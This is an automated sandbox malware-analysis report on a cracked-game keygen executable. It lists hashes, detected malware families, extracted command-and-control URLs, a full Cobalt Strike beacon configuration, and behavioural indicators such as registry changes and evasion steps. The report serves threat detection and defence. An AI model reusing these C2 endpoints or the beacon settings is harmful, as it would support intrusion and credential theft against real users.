azorult | 7c728c5ba64af9d4f03ad3437210e5a094b29da8ad2e2feed2230711434ddc49

Analysis

max time kernel
22s
max time network
533s
platform
windows10_x64
resource
win10v20201028
submitted
04-04-2021 05:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Test_Drive_Unlimited_2_keygen.exe
Size

5.2MB
MD5

a438d3b681e5250cad13ffbc5a8b1e5f
SHA1

e8106fabc033378b3644aa34b815147a77b83539
SHA256

297d988321fbbbadd950e60e649f2252049e4380b5824594113ea34c13a41410
SHA512

9727bbfc48c98c6caab97bf782122dd18e0cad567a1e7010a827086fc2db91abe85eb23e2cab7c538d9f7f2ffc3ee37463f3ed4c46b329800d76b8b650673c40

Score

10^/10

azorult cobaltstrike glupteba metasploit raccoon smokeloader vidar xmrig 9420f36ff86e78bbb8ce4073fa910f921ce2bebf afefd33a49c7cbd55d417545269920f24c85aa37 backdoor dropper evasion infostealer loader miner stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Extracted

Family

raccoon

Botnet

9420f36ff86e78bbb8ce4073fa910f921ce2bebf

Attributes

url4cnc
https://tttttt.me/hobamantfr1

rc4.plain

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Extracted

Family

cobaltstrike

http://74.222.26.215:4443/link

Attributes

access_type
512
beacon_type
2048
create_remote_thread
0
day
0
dns_idle
0
dns_sleep
0
host
74.222.26.215,/link
http_header1
AAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAcAAAAAAAAACwAAAAMAAAACAAAAK3dvcmRwcmVzc181MjIzODU1OGU5MzBmMWVjNjk5ZTRmMTJhYjAxNWE0Zj0AAAAGAAAABkNvb2tpZQAAAAkAAAAKaWNvbj1mYWxzZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_header2
AAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAZQWNjZXB0LUVuY29kaW5nOiBnemlwLCBicgAAAAoAAAAYQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluAAAABwAAAAEAAAANAAAAAwAAAAQAAAAHAAAAAAAAAAMAAAACAAAADl9fc2Vzc2lvbl9faWQ9AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_method1
GET
http_method2
POST
injection_process
jitter
10496
maxdns
0
month
0
pipe_name
polling_time
63837
port_number
4443
proxy_password
proxy_server
proxy_username
sc_process32
%windir%\syswow64\WUAUCLT.exe
sc_process64
%windir%\sysnative\WUAUCLT.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC+wlp09ycA6U24hmCvgm4N33Jpv343g5vjWOe58OBI8vKq3OLEevLDEYQcQQVIexStT4k5LyBL3VY/Kl1IIUFaTcscIeEFbq0FbBmEOvXm2xe2Abxj1xv1LUFNWnNSwrX76rOKkfBE+ppER/Mw4LyVX4TjTSNsBaGWUa7W43qVlQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
5.44480256e+08
unknown2
AAAABAAAAAIAAAJYAAAAAwAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown3
0
unknown4
0
unknown5
1.841236305e+09
uri
/admin
user_agent
Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; RM-1152) AppleWebKit/537.36 (KHTML, like Gecko)
year
0

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral4/memory/5336-209-0x00000000025A0000-0x0000000002EAA000-memory.dmp	family_glupteba
behavioral4/memory/5336-211-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba
behavioral4/memory/5336-210-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 8 IoCs

miner

resource	yara_rule
behavioral4/memory/5296-172-0x00000001402CA898-mapping.dmp	xmrig
behavioral4/memory/5296-169-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral4/memory/5296-184-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral4/memory/5296-221-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral4/memory/2288-1229-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral4/memory/6496-1240-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral4/memory/6496-1329-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral4/memory/2288-1358-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Executes dropped EXE 10 IoCs

pid	Process
3100	keygen-pr.exe
3368	keygen-step-1.exe
3484	keygen-step-3.exe
3028	keygen-step-4.exe
3240	key.exe
1720	Setup.exe
2924	multitimer.exe
3004	setups.exe
184	askinstall20.exe
2492	setups.tmp

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	2.exe

Loads dropped DLL 7 IoCs

pid	Process
2492	setups.tmp
2492	setups.tmp
2492	setups.tmp
2492	setups.tmp
2492	setups.tmp
2492	setups.tmp
2492	setups.tmp

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
139	ipinfo.io
307	ipinfo.io
310	ipinfo.io
391	ip-api.com
687	ipinfo.io
723	ip-api.com
137	ipinfo.io
574	ipinfo.io
578	ipinfo.io
180	ip-api.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	2.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 17 IoCs

pid	pid_target	Process	procid_target
4136	1592	WerFault.exe	156
4212	4040	WerFault.exe	263
3792	4008	WerFault.exe	157
7844	4008	WerFault.exe	157
4440	4008	WerFault.exe	157
4184	4008	WerFault.exe	157
4196	4008	WerFault.exe	157
408	4008	WerFault.exe	157
3232	4008	WerFault.exe	157
8160	4008	WerFault.exe	157
7584	4008	WerFault.exe	157
6660	4008	WerFault.exe	157
4608	4008	WerFault.exe	157
7796	4008	WerFault.exe	157
7660	4008	WerFault.exe	157
9708	6544	WerFault.exe	256
10628	8664	WerFault.exe	455

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
1268	timeout.exe
212	timeout.exe
7968	timeout.exe
7232	timeout.exe
11100	timeout.exe

Kills process with taskkill 8 IoCs

evasion

pid	Process
3436	taskkill.exe
6492	taskkill.exe
7516	taskkill.exe
8512	taskkill.exe
208	taskkill.exe
8004	taskkill.exe
2096	taskkill.exe
3740	taskkill.exe

Modifies Control Panel 1 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Colors	2.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	2.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000d091a5f7522961c94e2ff6ee65ba0f249043a9f00524daeeaf0e3f91f7aa5938e3c2ad28cdb6f6b5e125248808f5bda6ef328a3d6b76704901b877820ccec51657f84660c535ccd99b499be573a916ac09b780636609d37e8f9ec7fdcb3a8e106a5319e50e4500cca3baa8091d76edd86cf00a737f7d1b7046e2aa31f18f1b33f0f2f4d3f3859b6dea985c5505fc630db4fe0ad3a772a5c6a7a2b77d3e6e423eb9f7b935d597edab890344dfdbda9f3ecf014bbf8a884e816500a9d68575848db781a0636e1a7d54cd1b3cbdb3b275dc051a2c13b15fde8cf31a85f31846977c79b06cbba9adf9f54001e79af823c1c6cd6778681f983f6e66123d52917f916910a409a493f24cd30ad38544d1cdfdd6a4096b807dd1d9ffc106d9038ec1ca43f67c3ce25288d2e875b2fff2ee505bf17121b9031cabe6391718004f02add9a99f5a333dde0e29f869bea80f144cf8b107cd5d8dc3c65a0b8c668122bae1cb974e5d1072c42679b26f17bed326615a9dc92ec706dac2de48f4127d5243ff61a643a5017a466f39e449dd03aa382f2febf664f654e93ff0a2746f6dd8da8aa1938e667c3be8ec	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{9ED9BF43-0CF0-4B3D-B51E-1A50B0CE6798} = "0"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	2.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000842927b2363244cd26a4554c69aa17c78c835ef32a3493cb436ec953f9dbd9d0cd3effff5d123b89bea3734cb0cb57bd3fbf6e76a7a0ae3a39c8edad84ed182960a9c5b485f3fa5d20a07a69608083434ed183fc2f2d2e75614b	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1"	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	2.exe
